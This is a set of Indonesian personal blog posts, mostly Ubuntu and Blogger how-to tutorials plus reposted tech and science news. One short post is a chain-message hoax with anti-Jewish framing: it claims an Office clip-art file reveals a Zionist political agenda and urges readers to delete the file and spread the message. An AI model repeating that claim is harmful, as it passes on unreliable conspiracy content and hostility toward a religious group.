Nganjuk Online

Rilis Final Ubuntu 12.04 LTS aka Precise Pangolin

noreply@blogger.com (Muhib Faisal) — Thu, 26 Apr 2012 10:57:00 -0700

Setelah menunggu sekian lama dan melewati beberapa release candidat akhirnya pada tanggal 26 April 2012 kemarin Ubuntu 12.04 LTS aka Precise Pangolin telah dirilis versi finalnya. Yang lebih menarik adalah embel-embel LTS (Long Time Support). Memang ubuntu mengeluarkan versi-versinya setian 6 bulan sekali, tetapi setiap 2 tahun sekali mereka juga merilis versi yang bersifat Long Time Support. Misal ubuntu 8.04 LTS lalu rilis ubuntu 10.04 LTS dan sekarang ubuntu 12.04 LTS. Versi ubuntu biasanya support update hanya 2 tahun saja, tetapi ubuntu LTS akan disupport sampai 3 tahun.

Precise Pangolin menggunakan kernel 3.2 dan menggunakan desktop shell Unity. Dari sekilas review penulis, Precise Pangolin sangat ringan. Ini mungkin penyempurnaan dari versi ubuntu sebelumnya yang sudah menggunakan Unity sebagai desktop environmentnya.

Selain versi desktop, Ubuntu server pun juga dirilis pada hari yang sama. Penulis belum sempet mencoba karena belum sempet hehehe ^_^

Berikut adalah screenshotnya...

Untuk link downloadnya :

Official Site : Ubuntu.com

dan untuk sementara mirror lokal ada di rumahilmu.or.id

mirror-mirror yang lain menyusul ^_^

Selamat mencoba ^_^

Kostumasi Gedit Agar Lebih Powerfull

noreply@blogger.com (Muhib Faisal) — Thu, 4 Aug 2011 00:51:00 -0700

Manusia tentu tidak lepas dengan yang namanya lupa, salah, khilaf, dll. Tidak jauh beda saat seorang programmer sedang menulis script atau lebih dikenal dengan istilah coding.. :D Nah disini khusus bagi pengguna Linux Ubuntu, saya akan menjelaskan sedikit bagaimana mengkostumasi teks editor yang rata-rata sudah disertakan pada semua distro Linux. Yupz.. nama teks editor tersebut adalah gedit. cekidot.....

Install gedit-plugins dengan perintah

sudo apt-get install gedit-plugins

Aktifkan word completion

Download gedit-intelligent-text-completion dari SINI lalu extract di ~/.gnome2/gedit/plugins/. Buka gedit lalu buka gedit preference dari menu view->preference. Pada tab plugin aktifkan centang pada intellegetn Text Completion. Klik Configure Plugin dan centang semua lalu Ok

Masih di jendela gedit-preferences klik pada tab Editor lalu centang pada "enable automatic indentation

Untuk tampilan download font MONACO dari sini. Copy MONACO.TTF ke ~/.fonts. Tekan ctrl+H untuk melihan folder tersebut karena di linux file/folder yang diawali dengan "." akan terhidden. Jika folder .fonts belum ada maka kita harus membuat sendiri.

Download Darkmate Syntax color Scheme dari sini, lalu copy darkmate.xml ke folder /usr/share/gtksourceview-2.0/styles. Jika Anda tidak login sebagai root/administrator maka Anda tidak akan bisa mengcopy file tersebut ke /usr/share/gtksourceview-2.0/. Untuk mengcopynya jalankan nautilus sebagai admin dengan cara tekan alt+f2 lalu ketikkan gksu nautilus. Baru Anda bisa mengcopy file tadi.

Setelah itu restart gedit terlebih dahulu. Buka lagi gedit Preferences dan pada tab Font & Colors edit font menjadi monaco dan size menjadi 9

Masih pada tab Font & Colors di bagian Color Scheme pilih darkmate lalu close

Ni lama-lama gedit jadi kayak textmate punyanya Mac OS X yach .... :D
Sekian tutorial yang bisa saya buat. Dan karena gedit adalah salah satu software yang bersifat GNU maka kita bebas untuk mengeksplorasi...

Alternative Office Software That 100% Free

noreply@blogger.com (Muhib Faisal) — Sun, 12 Dec 2010 21:36:00 -0800

OpenOffice.org adalah kumpulan program untuk keperluan perkantoran. Program-program yang disediakan adalah word processor, spreadsheet, presentation, drawing dan lain-lain. Jika kita melihat program-program perkantoran seperti produk dari microsoft disana ada microsoft word, microsoft excel, microsoft powerpoint dan lain-lain yang memerlukan sekitar $600, $700, $800 atau lebih. Sedangkan produk yang dikeluarkan oleh openoffice.org adalah 100% gratis tanpa ada pungutan.

Openoffice.org adalah salah satu program open source dibawah naungan GNU General Public License (GNU GPL atau GPL), lisensi perangkat lunak bebas yang paling banyak dipakai. Selain bertujuan untuk menekan pembajakan, sekarang program-program open source sudah tidak kalah dengan program berbayar, atau bahkan lebih unggul. seperti contoh produk openoffice presentation. Program ini memiliki berbagai macam fitur diataranya slide, template presentasi, animasi dan lain-lain mirip dengan Microsoft PowerPoint. Hal yang membuat openoffice unggul dari pada microsoft office adalah semua file yang berformat microsoft office bisa dibaca/dibuka dengan baik oleh openoffice. Dan satu lagi yang perlu diingat adalah openoffice dibawah naungan General Public License yang artinya semua orang bisa menyebar luaskan dengan 100% gratis bahkan bebas untuk mengembangkannya. Lalu apa lagi yang kita tunggu?

Kerugian Negara Meningkat Karena Pembajakan

noreply@blogger.com (Muhib Faisal) — Sun, 12 Dec 2010 21:30:00 -0800

Pembajakan software selama di tahun 2010 ini, tidak akan berubah malah diprediksi akan terus mengalami peningkatan. Bahkan jumlahnya bisa mencapai USD1 miliar.

Dijelaskan Kepala Perwakilan Bussines Software Alliance (BSA), Donny A Sheyoputra, memang data yang dikeluarkan secara resmi mengenai jumlah kerugian akibat pembajakan software di Indonesia selama tahun 2010 ini belum keluar. Biasanya memang laporannya akan keluar pada Mei 2011 mendatang.

"Jika melihat dari tahun 2009, yang jumlah kerugiannya mencapai USD886 juta maka saya prediksi di tahun ini jumlahnya bisa menembus hingga USD1.000 juta," terang Donny, di sela-sela acara sosialisasi BSA, di Rumah Makan Seribu Rasa, di Jakarta, Senin (29/11/2010).

Prediksi Donny ini bukannya bentuk pesimistis dari penegakan pemberantasan pembajakan software di tanah air, namun imbas karena semakin meningkatnya pasar PC di Indonesia. Mengutip sebuah data, jumlah penjualan PC di pasar lokal, bisa mencapai 3 juta.

"Semakin tinggi permintaan PC, semakin tinggi pula permintaan softwarenya. Dan semakin tinggi pula peluang sebuah software dibajak," tambahnya.

Dia juga menambahkan, kerugian ini sebagian besar berasal dari aksi kotor perusahaan yang masih menerapkan kebijakan penggunaan software bajakan di ruang lingkup kerjanya. Walaupun tidak bisa dipungkiri juga, dari kalangan end user juga menyumbang kerugian, walaupun tidak sebesar di kalangan korporat.

Mengapa demikian?

Dicontohkan olehnya, 1 perusahaan menengah saja mempunyai sekira 50 komputer. Jika diestimasikan di kalangan perusahaan konstruksi, maka software yang diperlukan misalnya adalah, Microsoft, Office, Autodesk dan lain sebagainya, yang rata-rata lisensinya bisa mencapai USD3.000.

Kerugian juga tidak hanya berasal dari kalangan penyedia lisensi software tersebut karena dalam hal ini negara pun dapat akan mendapatkan sejumlah kerugian yang tidak sedikit.

"Kehilangan pendapatan bisa terjadi di Pajak Penambahan Nilai (PPN), bayangkan dari USD886 juta di tahun 2009, ambil sedikitnya 10 persen. Berapa banyak kerugian yang akan diderita?" sebut Donny.

Untuk itulah, Donny mengharapkan peran serta dari semua pihak, khususnya penegak hukum agar pengguna bajakan, khususnya dikalangan korporat bisa ditekan seminimal mungkin. Caranya, salah satunya dengan sosialisasi mengenai penggunaan dan peredaran software berlisensi.

Sumber : okezone.com

Repository Offline Untuk Ubuntu 10.04

noreply@blogger.com (Muhib Faisal) — Sun, 14 Nov 2010 04:24:00 -0800

Ini adalah pengalaman penulis ketika ingin menginstall aplikasi ubuntu. Saya tidak mempunyai koneksi internet di rumah. Setelah searching di internet saya menemukan sebuah tutorial yang menerangkan tentang repository offline yang mana kita nanti bisa menginstall aplikasi ubuntu tanpa perlu koneksi internet.

STEP PERTAMA
Kita download dulu file ISO dari server "kambing" yang jumlahnya 8 file atau ukurannya sekitar 32 GB.. Wow besar juga ya ^_^. Tapi untung saja teman saya Mas Edy sudah mempunyai semua file ISO tersebut. Link Downloadnya dibawah ini :

disk1
disk2
disk3
disk4
disk5
disk6
disk7
disk8

STEP KEDUA
Ubah nama file ISO untuk mempermudah saat mounting nanti. file ISO pertama dengan nama disk1.iso, file ISO kedua dengan nama disk2.iso begitu seterusnya sampai file ISO kedelapan

STEP KETIGA
Membuat folder untuk tempat mounting file-file ISO kita nanti. Jalankan perintah berikut

sudo mkdir /mnt/repo1
sudo mkdir /mnt/repo2
sudo mkdir /mnt/repo3
sudo mkdir /mnt/repo4
sudo mkdir /mnt/repo5
sudo mkdir /mnt/repo6
sudo mkdir /mnt/repo7
sudo mkdir /mnt/repo8

STEP KEEMPAT
Sebelumnya masuk dulu ke folder dimana Anda menyimpan file-file iso tadi. Semisal file saya ada di folder /home/pribumi/Download
maka harus menjalankan perintah berikut :

cd /home/pribumi/Download

Mount semua file ISO ke foldernya masing-masing. File ISO pertama ke folder repo1, file ISO kedua ke folder repo2 dan seterusnya. Untuk melakukannya jalankan perintah berikut

sudo mount -o loop disk1.iso /mnt/repo1/
sudo mount -o loop disk2.iso /mnt/repo2/
sudo mount -o loop disk3.iso /mnt/repo3/
sudo mount -o loop disk4.iso /mnt/repo4/
sudo mount -o loop disk5.iso /mnt/repo5/
sudo mount -o loop disk6.iso /mnt/repo6/
sudo mount -o loop disk7.iso /mnt/repo7/
sudo mount -o loop disk8.iso /mnt/repo8/

STEP KELIMA
Setelah kita mount semua file ISO kita harus menambahkan alamat file repo kita ke Software Source atau lewat terminal dengan mengedit file sources.list. Sebelumnya agar lebih aman, backup dulu file sources.list tersebut dengan perintah :

sudo cp /etc/apt/sources.list /etc/apt/sources.list.old

Lalu jalankan perintah berikut :

sudo gedit /etc/apt/sources.list

Setelah masuk ke jendela gedit, hapus semua kata-kata yang ada didalamnya dan ganti dengan alamat dibawah ini

deb file:/mnt/repo1 lucid main
deb file:/mnt/repo2 lucid main restricted
deb file:/mnt/repo3 lucid main multiverse restricted universe
deb file:/mnt/repo4 lucid universe
deb file:/mnt/repo5 lucid universe
deb file:/mnt/repo6 lucid universe
deb file:/mnt/repo7 lucid universe
deb file:/mnt/repo8 lucid universe

LANGKAH KEENAM
Update daftar Aplikasi repository offline dengan langkah-langkah berikut :

sudo apt-get update

Repository offline telah siap digunakan. Jika nanti ketika Anda menginstall aplikasi ubuntu ada konfirmasi Authentication maka jawab saya "y"

Selamat mencoba dan Ucapan terima kasih sebanyak-banyaknya ke Mas Edy yang telah lapang dada mendownloadkan file-file ISO tadi ^_^

Habibie: Dunia Semakin Mengecil karena Teknologi

noreply@blogger.com (Muhib Faisal) — Sat, 6 Nov 2010 09:35:00 -0700

Mantan Presiden RI BJ Habibie menilai perkembangan teknologi di dunia saat ini sudah semakin melaju pesat. Bahkan ia menilai teknologi membuat dunia yang luas bagi manusia menjadi semakin sempit.

Hal itu, kata dia, didorong dengan kemajuan teknologi informasi yang saat ini disebut internet. Dengan berhubungan di dunia maya manusia kini dapat memperoleh informasi apapun dimana ada jaringan internet.

"Saat ini dunia sudah semakin mengecil. Saya menyebutnya dengan 'dunia dot com', apapun informasi mudah kita dapat," ujarnya di kepada wartawan usai acara pembukaan Kongres Himpunan Mahasiswa Islam (HMI) ke-27 di Graha Insan Cita, Cimanggis, Depok, Sabtu (06/11/10).

Habibie menambahkan informasi memiliki sifat yang relatif, bukan absolut. Habibie bahkan meminta bangsa Indonesia untuk bangkit dan terus berinovasi dalam perkembangan teknologi.

"Hati-hati dengan 'dunia dot com'. Pandai-pandailah memanfaatkan. Bukan hanya itu, pandai-pandailah menjaganya. Para pemuda harus stand up, kembangkan terus ilmu," tandasnya.

Sumber : okezone.com

Nih Agenda Pesta Blogger+ 2010

noreply@blogger.com (Muhib Faisal) — Fri, 29 Oct 2010 02:25:00 -0700

Puncak perayaan Pesta Blogger 2010 akan segera digelar Sabtu besok, di Epicentrum Walk, Kuningan, Jakarta, sekira 1.300 penggiat dunia maya dari berbagai platform siap menyerbu hajatan kopi darat terbesar di Indonesia tersebut.

Dalam keterangan yang diterima okezone, Jumat (29/10/2010), sejumlah acara akan dipadatkan sejak pukul 8 pagi sampai dengan 17.45 petang. Acara Pesta Blogger+ 2010 ini juga akan diisi oleh sejumlah musisi yang tentunya besar dan dekat dengan dunia maya.

Dimulai dengan registrasi pada pukul 8 tepat, acara akan dimulai dengan menyanyikan lagu Indonesia Raya secara bersama-sama oleh ribuan blogger dan yang lainnya, langsung disambung dengan tarian pembuka yang berjudul Gandrang Bulo.
Tepat pukul 10.15 akan ada sambutan dari pihak Kedubes Amerika Serikat, serta Acer Indonesia, selaku sponsorship utama dari acara yang sudah digelar untuk keempat kalinya tersebut. Yang menarik, dalam pembukaan tidak akan ada perwakilan dari pihak pemerintah, seperti Menkominfo Tifatul Sembiring.

Musisi Saykoji langsung menghibur para peserta pada pukul 10.40. Sejumlah hits seperti 'online', nampaknya akan dibawakan oleh trio rapper tersebut. Saykoji akan tampil kurang lebih selama 20 menit.

Selanjutnya, ini yang menarik, pukul 11.00 akan ada acara Kaleidoskop Media Sosial selama tahun 2010, yang menurut kabar dari panitia akan dibawakan secara menarik oleh presenter dan musisi Pandji Pragiwaksono. Seperti diketahui, Pandji merupakan salah satu aktifis kepemudaan yang rajin 'berorasi' melalui Twitter.

Puncak acara Pesta Blogger+ 2010 ini akan dilakukan setelah makan siang, dibawa akan ada break out session yang terdiri dari beberapa ruangan yang dinamakan dengan nama-nama pulau, seperti Pulau Penyengat, Pulau Nusa Peninda, Pulau Tarakan, Pulau Biak, Pulau Komodo, Pulau Tidung, Pulau Madura, Pulau Bunaken, Pulau Karimun Jawa dan Pulau Selayar.

So, sudah siap berkumpul dengan para blogger di seluruh dunia?

Sumber : okezone.com

Tidur Cukup kok Masih Ngantuk di Siang Hari?

noreply@blogger.com (Muhib Faisal) — Fri, 29 Oct 2010 02:21:00 -0700

Bagi sebagian orang, tidur cukup dapat bermanfaat untuk menjaga stamina tubuh agar fit dalam menjalankan aktifitas. Kendati sudah tidur cukup, terkadang kita masih suka merasa mengantuk di siang hari.

Hal tersebut bukannya tanpa sebab. Pasalnya, ada perbedaan dalam gen mereka. Sehingga orang yang jam tidurnya sama memiliki kesegaran tubuh yang berbeda pada siang hari. Dalam jurnal American Academy of Neurology, gen yang disebut DQB1*0602 akan membuat pemilik tersebut mengalami narkolepsi atau sebuah gangguan tidur yang menyebabkan kantuk berlebihan pada siang hari.

Dikutip Science Daily, Jumat (29/10/2010), kesimpulan ini sendiri diambil setelah para ilmuwan dari University of Pennsylvania School of Medicine meneliti sampel pola tidur dan aktivitas sehari-hari dari 92 orang dewasa sehat yang tidak memiliki varian gen tersebut dan 37 orang dewasa sehat yang memiliki varian gen DQB1*0602 namun memiliki pola tidur yang sehat.

Pengujian dilakukan dengan cara, selama dua malam pertama, mereka menghabiskan 10 jam di tempat tidur dan beristirahat total. Namun lima malam berikutnya mereka hanya boleh tidur selama empat jam dalam semalam.

Hasilnya, mereka yang memiliki varian gen DQB1*0602 lebih mudah lelah ketika waktu tidurnya berkurang ataupun waktu tidurnya penuh. Sedangkan yang tidak memiliki gen ini, tidak mengalami gangguan yang sama.

Alasannya karena pemilik gen DQB1*0602 yang sebelum mengalami kekurangan tidur, akan terbangun paling sedikit lima kali dalam semalam. Sedangkan yang tidak memiliki gen ini, hanya terbangun dua sampai tiga kali saja.

"Varian gen ini bisa menjadi penanda biologis untuk memprediksi bagaimana seseorang merespons kondisi yang kurang tidur," kata ketua penelitian Namni Goel.

"Namun mereka yang memiliki dan tidak memiliki varian gen tersebut sama-sama mampu berkonsentrasi, mempunyai kualitas daya ingat yang sama, dan berusaha mengusir kantuk pada siang hari," tandasnya.

Sumber : okezone.com

Cara mengganti Plymouth Pada Ubuntu

noreply@blogger.com (Muhib Faisal) — Mon, 25 Oct 2010 23:45:00 -0700

Saya sekali mengubah-ubah tampilan ubuntu. salah satunya adalah pengubah tampilan plymouth. Sampel plymouthnya kita bisa download dari situs gonome-look.org. sebagai contoh saya menggunakan plymouth linuxMint. Ok mari kita mulai

Download dulu plymouth Disini
Extrak file yang telah kita download ke folder /lib/plymouth/themes/

sudo unzip linuxmint_plymouth.zip -d /lib/plymouth/themes/

Jalankan perintah berikut agar kita bisa memilih plymouth yang kita kehendaki pada alternative default.plymouth nanti

sudo update-alternatives --install /lib/plymouth/themes/default.plymouth default.plymouth /lib/plymouth/themes/Lmint/Lmint.plymouth 100

Langkah berikutnya adalah memilih plymouth mana yang akan kita aktifkan

sudo update-alternatives --config default.plymouth

Pilih plymouth yang Anda inginkan dengan cara ketik nomor pada kolom "selection status". Pada contoh saya ketikkan nomor 1

Yang terakhir kita jalankan perintah berikut untuk memberlakukan plymouth yang kita pilih

sudo update-initramfs -u

Selamat Plymouth Anda telah berubah

Efek Menajubkan di Ubuntu dengan Compiz

noreply@blogger.com (Muhib Faisal) — Mon, 25 Oct 2010 23:21:00 -0700

Bagi yang suka dengan animasi tentu kurang nyaman jika ubuntu kita hanya menggunakan animasi standart tanpa kita bisa mengaturnya. Ubuntu telah menyediakan fisilitas agar kita bisa mengatur efek-efek pada compiz dengan menggunakan compiz manager. Untuk memaksimalkan compiz kita perlu install beberapa aplikasinya, antara lain :

sudo apt-get install compiz
sudo apt-get install compiz-plugins
sudo apt-get install compiz-gnome
sudo apt-get install compiz-core
sudo apt-get install emerald
sudo apt-get install compiz-fusion-plugins-main
sudo apt-get install compiz-fusion-plugins-extra
sudo apt-get install fusion-icon
sudo apt-get install compizconfig-settings-manager

Kita bisa menginstall secara terpisah atau bisa kita satukan dengan perintah

sudo apt-get install compiz compiz-plugins compiz-gnome compiz-core emerald compiz-fusion-plugins-main compiz-fusion-plugins-extra fusion-icon compizconfig-settings-manager

Compiz adalah salah satu bukti kalau Linux tidak kalah dengan OS berbayar seperti Win**s dan M*cO*X

Pada artikel berikutnya saya akan menerangkan bagaimana menyeting compiz manager agar lebih maksimal

Beberapa Screenshot Compiz :

Tips Memilih Domain

noreply@blogger.com (Muhib Faisal) — Sat, 28 Aug 2010 22:22:00 -0700

Dalam membangun sebuah website yang namanya domain adalah hal yang sangat penting karena merupakan alamat dimana para pengujung bisa mengakses website kita. Memang terserah kita dalam memilih domain, akan tetapi perlu kecermatan untuk memilihnya agar website kita mudah diingat dan familiar dimata para pengujung. Berikut ini adalah tip untuk memilih dan membeli domain :

UTAMAKAN DOMAIN .COM
Mengamankan domain .com sangatlah penting. Apalagi untuk sebuah situs e-commerce berskala internasional. Mari menyimak produk besar seperti yahoo, google, ebay, maupun youtube.
Secara tidak sadar, kita pasti menambahkan .com di belakang masing-masing nama tersebut bukan? Tidak salah, karena memang .com sudah tercetak terlebih dahulu di mindset kita tanpa perlu menyebutkannya. Jadi, tidak peduli seberapa bagus domain .net .biz .in.us tetap amankan .com Anda. Bahkan produk sekuat kaskus.us pun telah mengamankan domain .com nya.

HINDARI TANYA (-) DASHES
Jika dalam tulisan memang tidak akan terlalu berpengaruh jika domain kita mengandung tanda dashes (-). Tapi dalam komunikasi verbal dan harus memberitahukan nama domain kita kepada klien tentu akan merepotkan. Contoh nyata pada kasus ini adalah portal IM3. saat itu memutuskan menggunakan domain http://www.m3access.com sebagai alternative karena situs utamanya adalah http://www.m3-access.com, tidak bagus dari segi viral marketing, atau marketing dari mulut ke mulut

HINDARI EJAAN YANG SUSAH
Perhitungkan cara lafal dan kemungkinan mistype dari target pengunjung website kita. Misalkan saja www.ewedlock.com, mungkin menjadi kurang tepat jika targe market adalah orang Indonesia. Sebab susah dieja dan dihafal oleh masyarakat yang kesehariannya bukan menggunakan bahasa Inggris. Sekali lagi, tidak bagus dari segi viral marketing, atau marketing dari mulut ke mulut.

SESUAI BIDANG USAHA
Memasukkan unsure produk kedalam domain bisa dibilang hal yang cerdas, karena akan mempermudah pengunjung untuk mengidentifikasi bahwa situs tersebut menyediakan apa yang mereka cari. http://www.ilmuwebsite.com adalah contohnya. Situs tersebut memang menyediakan ilmu/ pengetahuan tentang website.

SETIAP DOMAIN WAJIB DILENGKAPI DOMAIN MANAGER
Domain Manager berfungsi untuk menunjukkan kepemilikan dan hak akses terhadap suatu domain. Domain manager yang lengkap, minimal menyediakan hak akses sebagai berikut:

Mengubah name server
Mengetahui EPP key
Melakukan Move Service
Mengganti detil akun

DOMAIN DILENGKAPI FASILITAS YANG MENUNJANG
Dengan harga domain yang kita bayar seharusnya kita mendapatkan fasilitas yang kita harapkan untuk menunjang jalannya website kita. Beberapa fasilitas tersebut adalah

Free DNS : untuk mengaktifkan fitur mail server Google Apps, mengarahkan domain ke blogspot, atau mengarahkan domain ke server pribadi kita
Free Domain Forwarding : untuk melakukan pengarahan domain ke blog wordpress atau situs lainnya.
Free Email Forwarding : berfungsi untuk melakukan masking terhadap akun email yahoo, hotmail atau gmail kita ke akun email dengan nama domain kita. Sehingga seolah-olah nama domain kita memiliki alamat email sendiri.
Privacy Protection : berfungsi untuk merahasiakan identitas kita di situs mencarian semacan who.is. menghindarkan inbox kia dari SPAM dan pihak lain yang ingin membeli domain kita.

Semoga Tip-tip diatas bisa membantu Anda dalam memilih nama domain

Menambahkan Background GRUB2 di Ubuntu

noreply@blogger.com (Muhib Faisal) — Wed, 28 Jul 2010 08:06:00 -0700

Ini adalah kasus yang saya alami ketika ingin mempercantik tampilan Menu Pilihan Booting, di linux biasa disebut GRUB. Pada linux 9.04 keatas telah menggunakan GRUB 2. Disini saya akan memberi tahukan cara menambahkan background pada GRUB2. OK Mari kita mulai... :D

Buka terminal lalu jalankan perintah :

sudo aptitude install grub2-splashimages

Setelah selesai installasi buka folder filesystem->usr->share->images->grub. Anda akan melihat contoh gambar-gambar. Pilih salah satu lalu copy nama file gambar tersebut (tanpa ekstensi .tga)
Jalankan perintah

sudo gedit /etc/grub.d/05_debian_theme

Edit pada line 26 sehingga menjadi seperti dibawah ini (contoh gambar yang saya pilih adalah Fly-Angel)

for i in {/boot/grub,/usr/share/images/grub}/Fly-Angel.{png,tga} ; do

Save lalu tutup jendela gedit
Update GRUB dengan perintah

sudo update-grub

Yang terakhir adalah restart komputer Anda :D

Semoga membantu ....

Mengembalikan Grub2 Setelah Instalasi Windows

noreply@blogger.com (Muhib Faisal) — Sun, 25 Jul 2010 20:46:00 -0700

Urutan instalasi yang mudah untuk melakukan instalasi 2 operating system antara Windows dan Linux adalah install Windows terlebih dahulu dan Linux berikutnya karena Linux lah yang bertugas menginstal Menu Multi Boot di MBR (Master Boot Record). Pembahasan instalasi Windows dan linux tidak akan saya bahas disini karena sudah banyak tutorial di dunia maya yang sudah menerangkan tentang hal tersebut. Yang ingin saya bahas adalah bagaimana jika ada kerusakan pada windows dan memaksa kita untuk install ulang windows kita. Apakah harus menginstal ulang Linux juga? Hohoho tidak ada masalah yang tidak ada jalan keluarnya :D Ini adalah kasus yang saya alami sendiri. Sebelumnya ada dua operating system yang saya pakai yaitu Windows XP dan Ubuntu 10.04.

Suatu saat computer saya terserah virus, lebih tepatnya windows saya :P yang memaksa saya melakukan install ulang. Setelah saya melakukan install ulang windows saya ternyata menu multi boot untuk memilih apakah ingin masuk Ubuntu atau Windows telah hilang karena instalasi Windows tadi. Ok berikut langkah-langkah yang akan kita lakukan untuk merecovery GRUB2 (menu multi boot) :

Booting menggunakan cd live ubuntu Anda dan masuk ke terminal lalu jalankan perintah

$ sudo fdisk –l

Lihat dimana letak partisi system ubuntu Anda berada! Sebagai contoh pada harddisk saya system Ubuntu terdapat di /dev/sda4

Mount partisi ubuntu Anda dengan perintah

$ sudo mount /dev/sda4 /mnt

Mount seluruh partisi yang ada dengan perintah

$ sudo mount --bind /dev /mnt/dev

$ sudo mount --bind /proc /mnt/proc

$ sudo mount --bind /sys /mnt/sys

Masuklah kedalam system yang telah kita mount tadi dengan perintah

$ sudo chroot /mnt

Setelah posisi kita di dalam root maka kita tidak akan perlu menjalankan perintah selanjutnya dengan perintah awalan sudo

Yang terakhir adalah melakukan instalasi GRUB2 kedalam MBR (Master Boot Record) dengan perintah

# grub-install /dev/sda

Setelah selesai, restart Komputer Anda dan lihat menu GRUB2 Anda telah kembali

*NB :

Ubuntu yang sudah menggunakan GRUB2 adalah versi 9.10 (Karmic Koala) keatas
Tanda "$" menandakan kita login sebagai user, sedangkan tanda "#" menandakan kita telah login sebagai root

Berdirinya Komunitas Blogger Nganjuk

noreply@blogger.com (Muhib Faisal) — Fri, 23 Jul 2010 21:10:00 -0700

Tepatnya pada tanggal 15 Juli 2010 telah diadakan musyawarah yang dilanjutkan dengan seleksi pemenang lomba blogger se-Nganjuk yang diadakan oleh POMOSDA dalam rangka memperingati ulang tahun POMOSDA yang ke-15. Dalam musyawarah tersebut rencananya akan diadakan pembentukan ulang komunitas blogger Nganjuk yang dulu pernah ada. “Dulu memang pernah ada komunitas blogger di Nganjuk, tapi tidak tahu mengapa komunitas ini hilang begitu saja, mungkin karena julukan Nganjuk adalah KOTA ANGIN lalu komunitasnya tersapu angin lalu hilang entah kemana?” Kata salah satu peserta musyawarah sambil tertawa.

Tetapi karena adanya tekat bulat yang dimiliki putra-putri Nganjuk maka tersiratlah ide untuk mengumpulkan lagi anggota-anggota blogger yang pernah ada. Dan tidak diduga ternyata banyak juga blogger-blogger Nganjuk baru yang ikut ambil bagian. Ada dari masyarakat umum, mahasiswa, siswa setara SMA, siswa setara SMP, bahkan ada juga guru-guru yang hadir. Musyawarah dibuka oleh Pembina 3 Sekolah Tinggi Teknologi Pondok Modern Sumber Daya At-Taqwa (STT POMOSDA) selaku panitia lomba blogger sekabupaten Nganjuk. Dari hasil musyawarah perdana ini maka ditunjuklah pengurus-pengurus sebagai berikut :

Saudara Nurmanto sebagai Ketua
Mas Edy sebagai Wakil Ketua
Kang Supris sebagai Penasehat
Saudara Faisal sebagai Sekretaris
Saudara Miftahur sebagai Admin Website KotaAngin.com
Mas Ndop sebagai Desainer, dan
Semua Blogger Nganjuk sebagai Anggota

Tujuan komunitas ini adalah memajukan Kota Nganjuk di bidang IT/ Teknologi. Tidak seperti komunitas/organisasi seperti yang lain, komunitas ini tidaklah terlalu formal namun diharapkan tetap ada kosistensi dari setiap anggota untuk menggapai tujuan tadi. Bahkan kemaren juga direncanakan bakti sosial seperti mengadakan workshop ke sekolah-sekolah mengenai blogging, donor darah 3 bulan sekali, dll. Semoga dengan dibentuknya komunitas/organisasi ini Nganjuk akan semakin maju dan menjadi contoh bagi kota-kota yang lain. Amiin...

Zionis Israel di dalam Office

noreply@blogger.com (Muhib Faisal) — Tue, 22 Jun 2010 19:36:00 -0700

Solidaritas Muslim Anti Israel & Yahudi, dimohon untuk: C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\ cari gambar dengan nama file J0285926. Anda akan temukan gambar Lambang/bendera zionis Israel lengkap (persis dengan warna aslinya) dengan lilin (sarana ibadah mereka).

HAPUS! Gambar tersebut ada disemua PC di seluruh dunia. Apakah Microsoft hanya mengepentingkan Bisnis atau Ada Muatan Politik ??? SEBARKAN SEMAMPUNYA

Menyembunyikan Blog Title pada Blogger

noreply@blogger.com (Muhib Faisal) — Tue, 22 Jun 2010 19:20:00 -0700

Bila kita menggunakan template default milik blogger, maka kita akan menjumpai tampilan-tampilan yang sederhana. Salah satunya bagian header, yang mana didalamnya terdapat Blog Title dan Blog Description. Pada menu setting blogger kita tidak akan menemukan pilihan apakah Blog Title dan Blog Description tersebut akan ditampilkan atau tidak. Dan pada kasus ini saya akan memberikan sedikit trik EDIT HTML bagaimana cara menyembunyikan Blog Title dan Blog Description karena menurut saya akan mengganggu jika saya akan memasang Banner di posisi header tersebut.

Yang perlu kita lakukan adalah :

1. Login ke Blogger Anda
2. Masuk ke Menu Design/Tata Letak ==> Edit HTML

3. Backup dulu template Anda dengan cara Download Full Template untuk menghindari apabila nanti terjadi kerusakan
4. Cari kode di bawah ini :

Untuk Blog Title

#header h1 { margin:50;
padding:5px 0 0 10px;
font-size: 100%;
font-weight:bold;
line-height: 1.2em;
letter-spacing:.0em;
font-style:italic;
color:#FFFFFF;
}

Lalu sisipkan kode visibility:hidden; didalam tanda { }, terserah urutannya
Contohnya sebagai berikut :

#header h1 {visibility:hidden;
margin:50;
padding:5px 0 0 10px;
font-size: 100%;
font-weight:bold;
line-height: 1.2em;
letter-spacing:.0em;
font-style:italic;
color:#FFFFFF;
}

atau

#header h1 {margin:50;
padding:5px 0 0 10px;
font-size: 100%;
font-weight:bold;
line-height: 1.2em;
letter-spacing:.0em;
font-style:italic;
color:#FFFFFF;
visibility:hidden;
}

Untuk Blog Description
Cari Kode ini #header .description
Lalu lakukan langkah-langkah seperti halnya pada Blog Title

Kemudian simpan dengan cara klik Tombol Save Now
Tulisan Blog Title dan Blog Description sudah tidak kelihatan lagi :D
Selamat Mencoba....

CEO Facebook Terancam Hukuman Mati

noreply@blogger.com (Muhib Faisal) — Tue, 22 Jun 2010 02:43:00 -0700

ISLAMABAD - Kasus penghinaan terhadap Nabi Muhammad di situs jejaring sosial Facebook masih berbuntut panjang di Pakistan. Munculnya fan page 'Draw Muhammad Day' memang sempat membuat pemerintah Pakistan memblokir Facebook untuk beberapa saat dan kemudian membuka lagi situs tersebut.

Tapi tak hanya berhenti sampai di situ, kini sejumlah pengacara Pakistan meminta polisi agar menyelidiki CEO Facebook, Mark Zuckerberg atas tuduhan penghinaan agama. Bila terbukti maka Zuckerberg terancam sanksi hukuman mati atas kasus tersebut.

Seperti diketahui, Mei 2010 lalu, sekelompok Facebooker mengumumkan kepada dunia jika besok, tepat tanggal 20 Mei 2010 merupakan hari dimana semua orang diperbolehkan untuk menggambar sketsa Nabi Muhammad. Fan page bertajuk' Everybody Draw Mohammed Day! ini mengundang kecaman dari banyak pengguna Facebook dari negara-negara Islam.

Pengacara asal Pakistan, Muhammad Zahar Siddique mengajukan 'First Information Report (FIR)' agar segera menyelidiki Zuckerberg sesuai aturan Pakistan Penal Code section 295-c tentang penodaan terhadap agama.

Aturan tersebut memuat, siapa pun yang menggunakan kata-kata, baik lisan maupun tulisan secara langsung atau tidak langsung, mencemarkan nama suci Nabi Muhammad SAW harus dihukum mati, atau penjara seumur hidup, dan juga harus bertanggung jawab. Demikian dilansir Softpedia, Minggu (20/6/2010).

